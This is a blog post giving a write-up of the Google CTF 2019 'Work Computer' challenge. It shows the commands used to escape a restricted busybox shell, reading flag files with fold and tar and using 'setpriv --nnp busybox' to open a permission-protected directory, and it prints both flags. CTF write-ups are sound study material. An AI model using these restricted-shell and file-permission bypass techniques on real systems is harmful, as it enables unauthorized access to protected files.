Skip to content

YlmzCmlttn

Cemalettin Yılmaz Blog

Menu
  • Home
  • About Me
  • Projects
    • Iot-AR
    • Magnifi-AR
    • Smarthome-IOS
    • Others
  • Categories
    • Articles
    • Augmented Reality
    • Capture The Flag
      • Google CTF
        • 2018
    • Embedded Systems
    • IoT
    • Logisim
    • My Essays
    • Nvidia Jetson
      • Jetson TX1
    • Operating Systems
      • Kali
      • Raspbian
      • Ubuntu
    • Personal
    • Programming
      • Arduino
      • C
      • C#
      • Css
      • Html
      • Js
      • Matlab
      • Node.js
      • Python
      • Swift
      • VHDL
    • Projects
      • Embedded Systems
      • Electric
      • IoT
      • IoT-AR
      • Logisim
      • Magnifi-AR
      • Pose Estimation
    • Raspberry Pi
    • Xilinx
    • Others
Menu

Work Computer | Google CTF 2019

Posted on July 3, 2019 by Yılmaz Cemalettin

Google CTF 2019

Work Computer

With the confidence of conviction and decision making skills that made you a contender for Xenon’s Universal takeover council, now disbanded, you forge ahead to the work computer. This machine announces itself to you, surprisingly with a detailed description of all its hardware and peripherals. Your first thought is “Why does the display stand need to announce its price? And exactly how much does 999 dollars convert to in Xenonivian Bucklets?” You always were one for the trivialities of things. Also presented is an image of a fascinating round and bumpy creature, labeled “Cauliflower for cWo” – are “Cauliflowers” earthlings? Your 40 hearts skip a beat – these are not the strange unrelatable bipeds you imagined earthings to be.. this looks like your neighbors back home. Such curdley lobes. Will it be at the party? SarahH, who appears to be a programmer with several clients, has left open a terminal. Oops. Sorry clients! Aliens will be poking around attempting to access your networks.. looking for Cauliflower. That is, *if* they can learn to navigate such things.

readme.ctfcompetition.com 1337

You can find my all CTF solution in here

I connect to readme.ctfcompetition.com 1337 with using nc command.

1
nc readme.ctfcompetition.com 1337

This opens a unix terminal and current directory have README.flag and ORME.flag files. I couldn’t open this file with using nano, vim, cat, strings, file. These commands doesn’t works. After that I search file read commands in https://gtfobins.github.io/  web-site. I figure out the fold command. When I try to call fold command, it works.

1
2
fold -w10000 README.flag
CTF{4ll_D474_5h4ll_B3_Fr33}

I find the flags. But when, I try to open ORME.flag, I saw the permission denied message.

1
2
fold -w10000 ORME.flag
fold: ORME.flag: Permission denied

So that, this question have also different way to solve.

When I search a little bit, I saw bin folder. That files include binaries. I try to find familiar binaries. Tar is one of the familiar binaries for me. When I try to tar;

1
2
tar c README.flag
README.flag0000400000247200024720000000003413507124515010416 0ustar  13381338CTF{4ll_D474_5h4ll_B3_Fr33}

I find the flag but still I couldn’t open ORME.flag

1
2
3
tar c ORME.flag
tar: can't open 'ORME.flag': Permission denied
tar: error exit delayed from previous errors

I need root permission.

I search the folders and I notice that message when I try to open challenge_setup folder in svr folder

1
2
3
4
5
6
> cd ../srv/
> ls
challenge_setup
> cd challenge_setup
error: Permission denied
>

It can be related to ORME.flag

In the bin file when I use ls -la command

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
ls -la
total 808
drwxr-xr-x    2 65534    65534         4096 Jun 13 14:28 .
drwxr-xr-x   20 0        0             4096 Jun 13 14:28 ..
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 arch -> /bin/busybox
-rwxr-xr-x    1 65534    65534       796240 Jan 24 07:45 busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 chgrp -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 chown -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 conspy -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 date -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 df -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 dmesg -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 dnsdomainname -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 dumpkmap -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 echo -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 false -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 fdflush -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 fsync -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 getopt -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 hostname -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 ionice -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 iostat -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 ipcalc -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 kill -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 login -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 ls -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 lzop -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 makemime -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 mkdir -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 mknod -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 mktemp -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 mount -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 mountpoint -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 mpstat -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 netstat -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 nice -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 pidof -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 ping -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 ping6 -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 pipe_progress -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 printenv -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 ps -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 pwd -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 reformime -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 rm -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 rmdir -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 run-parts -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 setpriv -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 setserial -> /bin/busybox
-r-sr-xr-x    1 1338     1338         19936 Jun 13 12:48 shell
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 sleep -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 stat -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 stty -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 sync -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 tar -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 true -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 umount -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 uname -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 usleep -> /bin/busybox
lrwxrwxrwx    1 65534    65534           12 May  9 20:49 watch -> /bin/busybox

I figure out every binaries call busybox binary. When I call it,

1
2
> busybox
busybox can not be called for alien reasons.

Also I figure out thr setpriv binaries.

1
2
3
4
5
6
7
8
9
10
11
setpriv
BusyBox v1.29.3 (2019-01-24 07:45:07 UTC) multi-call binary.
 
Usage: setpriv [OPTIONS] PROG [ARGS]
 
Run PROG with different privilege settings
 
-d,--dump Show current capabilities
--nnp,--no-new-privs Ignore setuid/setgid bits and file capabilities
--inh-caps CAP,CAP Set inheritable capabilities
--ambient-caps CAP,CAP Set ambient capabilities

I can call binaries which is needed root permision binaries, with using setpriv.

YESSS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
setpriv --nnp busybox
BusyBox v1.29.3 (2019-01-24 07:45:07 UTC) multi-call binary.
BusyBox is copyrighted by many authors between 1998-2015.
Licensed under GPLv2. See source distribution for detailed
copyright notices.
 
Usage: busybox [function [arguments]...]
   or: busybox --list[-full]
   or: busybox --install [-s] [DIR]
   or: function [arguments]...
 
BusyBox is a multi-call binary that combines many common Unix
utilities into a single executable.  Most people will create a
link to busybox for each function they wish to use and BusyBox
will act like whatever it was invoked as.
 
Currently defined functions:
[, [[, acpid, add-shell, addgroup, adduser, adjtimex, arch, arp,
arping, ash, awk, base64, basename, bbconfig, beep, blkdiscard, blkid,
blockdev, brctl, bunzip2, bzcat, bzip2, cal, cat, chgrp, chmod, chown,
chpasswd, chroot, chvt, cksum, clear, cmp, comm, conspy, cp, cpio,
crond, crontab, cryptpw, cut, date, dc, dd, deallocvt, delgroup,
deluser, depmod, df, diff, dirname, dmesg, dnsdomainname, dos2unix, du,
dumpkmap, dumpleases, echo, ed, egrep, eject, env, ether-wake, expand,
expr, factor, fallocate, false, fatattr, fbset, fbsplash, fdflush,
fdformat, fdisk, fgrep, find, findfs, flock, fold, free, fsck, fstrim,
fsync, fuser, getopt, getty, grep, groups, gunzip, gzip, halt, hd,
hdparm, head, hexdump, hostid, hostname, hwclock, id, ifconfig, ifdown,
ifenslave, ifup, init, inotifyd, insmod, install, ionice, iostat, ip,
ipaddr, ipcalc, ipcrm, ipcs, iplink, ipneigh, iproute, iprule,
iptunnel, kbd_mode, kill, killall, killall5, klogd, less, link,
linux32, linux64, ln, loadfont, loadkmap, logger, login, logread,
losetup, ls, lsmod, lsof, lspci, lsusb, lzcat, lzma, lzop, lzopcat,
makemime, md5sum, mdev, mesg, microcom, mkdir, mkdosfs, mkfifo,
mkfs.vfat, mknod, mkpasswd, mkswap, mktemp, modinfo, modprobe, more,
mount, mountpoint, mpstat, mv, nameif, nanddump, nandwrite, nbd-client,
nc, netstat, nice, nl, nmeter, nohup, nologin, nproc, nsenter,
nslookup, ntpd, od, openvt, partprobe, passwd, paste, patch, pgrep,
pidof, ping, ping6, pipe_progress, pkill, pmap, poweroff, powertop,
printenv, printf, ps, pscan, pstree, pwd, pwdx, raidautorun, rdate,
rdev, readahead, readlink, readprofile, realpath, reboot, reformime,
remove-shell, renice, reset, resize, rev, rfkill, rm, rmdir, rmmod,
route, run-parts, sed, sendmail, seq, setconsole, setfont, setkeycodes,
setlogcons, setpriv, setserial, setsid, sh, sha1sum, sha256sum,
sha3sum, sha512sum, showkey, shred, shuf, slattach, sleep, smemcap,
sort, split, stat, strings, stty, su, sum, swapoff, swapon,
switch_root, sync, sysctl, syslogd, tac, tail, tar, tee, test, time,
timeout, top, touch, tr, traceroute, traceroute6, true, truncate, tty,
ttysize, tunctl, udhcpc, udhcpc6, umount, uname, unexpand, uniq,
unix2dos, unlink, unlzma, unlzop, unshare, unxz, unzip, uptime, usleep,
uudecode, uuencode, vconfig, vi, vlock, volname, watch, watchdog, wc,
wget, which, whoami, whois, xargs, xxd, xzcat, yes, zcat

Finally I can call busybox. and it also have cat binary. Tar is fine 🙂

1
2
3
4
5
setpriv --nnp tar c challenge_setup
challenge_setup/0000500000000000000000000000000013500443047011232 5ustar  00challenge_setup/this_directory_is_not_part_of_the_challenge0000400000000000000000000000015113500133165022133 0ustar  00This directory is not part of the challenge. Seriously.
It's just needed for some setup. Use /challenge.
challenge_setup/README.flag0000400000000000000000000000003413475465777013052 0ustar  00CTF{4ll_D474_5h4ll_B3_Fr33}
challenge_setup/ORME.flag0000400000000000000000000000004113475465777012655 0ustar  00CTF{Th3r3_1s_4lw4y5_4N07h3r_W4y}

FLAGS:

CTF{4ll_D474_5h4ll_B3_Fr33}

CTF{Th3r3_1s_4lw4y5_4N07h3r_W4y}

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

My Motto

“Learn to share, Share to learn”

LinkedIn Badge

Cemalettin Yılmaz

Ads

Archives

Categories

  • Articles (1)
  • Augmented Reality (3)
  • Capture The Flag (23)
    • Google CTF (22)
      • 2018 (13)
      • 2019 (9)
    • PicoCTF (1)
      • 2019 (1)
  • Embedded Systems (3)
  • IoT (3)
  • Logisim (1)
  • My Essays (3)
  • Nvidia Jetson (5)
    • Xavier (5)
  • Operating Systems (24)
    • Kali (3)
    • Raspbian (2)
    • Ubuntu (21)
  • Others (1)
  • Personal (1)
  • Programming (44)
    • Arduino (4)
    • C (10)
    • C# (4)
    • C++ (5)
    • Css (1)
    • CUDA (6)
    • Html (1)
    • Js (2)
    • Libraries (5)
      • OpenCV (3)
      • OpenGL (2)
    • Matlab (14)
    • Node.js (5)
    • Python (6)
    • Swift (3)
  • Programs (4)
    • Tools (4)
  • Projects (21)
    • Books Solutions (8)
    • Electric (2)
    • Embedded Systems (2)
    • Energy Harvesting (1)
    • IoT (2)
    • IoT-AR (1)
    • Logisim (1)
    • Magnifi-AR (3)
    • Pose Estimation (3)
    • Smarthome-Ios (1)
  • Raspberry Pi (3)
  • Uncategorized (2)
  • YZlib (1)

Recent Posts

  • atof stof stod problems with local floating point separator in C/C++
  • Pico CTF 2019 Answers
  • YZlib: Personal C++ Library
  • Drive to target | Google CTF 2019
  • FriendSpaceBookPlusAllAccessRedPremium | Google CTF 2019

Recent Comments

  • AbaShelha on Ghidra Installation on Ubuntu |18.04, 16.04, 14.04
  • Peter on Ghidra Installation on Ubuntu |18.04, 16.04, 14.04
  • Yılmaz Cemalettin on Ghidra Installation on Ubuntu |18.04, 16.04, 14.04
  • Yılmaz Cemalettin on 16-Bit CPU on Logisim
  • Jenny on 16-Bit CPU on Logisim
  • MOON on 16-Bit CPU on Logisim
  • anti on Ghidra Installation on Ubuntu |18.04, 16.04, 14.04
  • hunkerjr on STOP GAN | Google CTF 2019
  • Shaq on 16-Bit CPU on Logisim
  • NURUL AFIQAH MOHD HASBULLAH on 16-Bit CPU on Logisim

Linkedln

© 2022 YlmzCmlttn | Powered by Superbs Personal Blog theme